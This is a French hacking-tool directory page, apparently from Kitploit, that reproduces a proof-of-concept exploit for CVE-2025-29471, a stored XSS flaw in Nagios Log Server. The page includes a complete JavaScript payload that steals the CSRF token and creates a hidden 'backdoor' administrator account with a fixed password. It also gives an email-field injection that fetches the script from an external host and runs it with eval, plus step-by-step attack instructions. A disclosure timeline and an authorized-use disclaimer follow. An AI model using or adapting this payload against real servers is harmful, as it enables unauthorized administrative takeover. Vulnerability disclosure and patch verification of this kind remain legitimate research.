Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-29471 — XSS stockée dans Nagios Log Server 2024R1.3.1 | Kitploit
Outils/GitHubGitHub/skraft9/cve-2025-29471
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubskraft9/cve-2025-29471

CVE-2025-29471

XSS stockée dans Nagios Log Server 2024R1.3.1

Voir le dépôt
13il y a 5 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité XSS stockée dans Nagios Log Server (élévation de privilèges en administrateur)

▶️ Démo du PoC

Date : 2025-04-02

Auteur de l'exploit : Seth Kraft

Page d'accueil du fournisseur : https://www.nagios.com/

Journal des modifications du fournisseur : https://www.nagios.com/changelog/#log-server

Lien du logiciel : https://assets.nagios.com/downloads/nagios-log-server/versions.php

Versions affectées : 2024R1.3.1 et versions antérieures

Testé sur : Nagios Log Server 2024R1.3.1 (configuration par défaut, Ubuntu 20.04)

ID CWE : CWE-79

Score de base : 8.3 (Élevé)

Vecteur : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Type : Cross-Site Scripting stocké (XSS), élévation de privilèges


Autorisation

Uniquement à des fins de test et de recherche autorisés. Ne testez pas et n'exploitez pas cette vulnérabilité sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.


Description :

Une vulnérabilité XSS stockée dans Nagios Log Server 2024R1.3.1 permet à un utilisateur à faibles privilèges d'injecter du JavaScript malveillant dans le champ « email » de son profil.

Lorsqu'un administrateur consulte les journaux d'audit, la charge utile s'exécute, entraînant une élévation de privilèges via la création non autorisée d'un compte administrateur.


Preuve de concept

1.Hébergez la charge utile xss.js sur votre serveur externe avec le contenu suivant. Github fonctionne très bien.

Mettez à jour <target-ip> avec l'IP ou le nom d'hôte de la cible Nagios Log Server.

root@kitploit:~
(function() {
  console.log("🔥[XSS] Payload Executing...🔥");

  var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
  if (!csrfTokenMatch) return;
  var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
  console.log("[XSS] CSRF Token:", csrfToken);

  var requestBody = "csrf_ls=" + csrfToken +
    "&name=backdoor" +
    "&[email protected]" +
    "&username=backdoor" +
    "&password=Password123!" +
    "&password2=Password123!" +
    "&auth_type=admin" +
    "&apiaccess=1" +
    "&language=en_US" +
    "&account_type=local";

  fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: requestBody
  })
  .then(response => response.text())
  .then(function(data) {
    console.log("🔥[XSS] User Created Successfully!🔥");
    console.log(data);
  })
  .catch(console.error);
})();
  1. Connectez-vous à Nagios Log Server en tant qu'utilisateur standard (non administrateur).

  2. Accédez au point de terminaison de mise à jour du profil :

    http://<target-ip>/nagioslogserver/profile/update

  3. Injectez la charge utile suivante dans le champ email. Mettez à jour la ligne fetch avec l'URL où xss.js est hébergé.

root@kitploit:~
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
  .then(response => response.text())
  .then(scriptText => eval(scriptText))
  .catch(console.error);
</script>
  1. Attendez qu'un administrateur consulte les journaux d'audit. Le JavaScript s'exécutera, créant un nouveau compte administrateur :

Nom d'utilisateur : backdoor

Mot de passe : Password123!

  1. Connectez-vous en tant que backdoor avec un accès administrateur complet dans Nagios Log Server.

Chronologie de la divulgation

  • 2025-02-07 : Le chercheur a signalé la vulnérabilité à Nagios
  • 2025-02-14 : Nagios a accusé réception du rapport de sécurité
  • 2025-03-03 : Le chercheur a demandé une mise à jour à Nagios
  • 2025-03-10 : Le chercheur a demandé une mise à jour à Nagios
  • 2025-03-17 : Nagios confirme que la vulnérabilité est traitée et qu'un correctif sera bientôt publié
  • 2025-03-19 : Nagios publie Nagios Log Server 2024R2
  • 2025-03-27 : Le chercheur a testé et vérifié que Nagios Log Server 2024R2 corrige la vulnérabilité XSS stockée et a informé Nagios
  • 2025-04-01 : MITRE réserve CVE-2025-29471 pour cette vulnérabilité XSS stockée, mais les détails sont restés non publiés en raison de l'absence d'avis de sécurité public de la part du fournisseur
  • 2025-04-09 : Nagios publie un correctif complémentaire à celui de la 2024R2 (2024R1.3.2), rétroportant le correctif de la vulnérabilité XSS stockée vers la branche 2024R1
  • 2025-04-15 : CVE-2025-29471 a été officiellement publié

Avertissement

Ce travail a été réalisé en dehors de mon emploi et reflète mes efforts personnels dans le cadre de recherches en cybersécurité.


Télécharger l’outil